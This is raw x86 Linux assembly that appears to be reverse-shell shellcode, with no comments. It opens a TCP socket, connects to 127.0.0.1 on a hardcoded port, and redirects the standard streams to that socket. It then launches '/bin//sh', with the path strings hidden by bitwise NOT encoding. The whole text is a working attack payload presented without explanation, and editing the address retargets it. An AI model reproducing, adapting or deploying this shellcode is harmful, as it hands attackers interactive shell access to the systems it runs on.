xor    ebx,ebx
mul    ebx
push   ebx
inc    ebx
push   ebx
push   0x2
mov    ecx,esp
mov    al,102
int    0x80
pop    ebx
pop    esi
push   0x100007f
pushw  0xd156
push   bx
push   0x10
push   ecx
push   eax
mov    ecx,esp
inc    ebx
push   102 
pop    eax
int    0x80
pop    ecx
xchg   ecx,ebx
l:
mov    al,63
int    0x80
dec    ecx
jns    l 
push   eax
push   0x978cd0d0
pop    eax
not    eax
push   eax
push   0x91969dd0
pop    eax
not    eax 
push   eax
xor    eax, eax
mov    ebx,esp
push   eax
push   ebx
mov    ecx,esp
mov    al,11
int    0x80
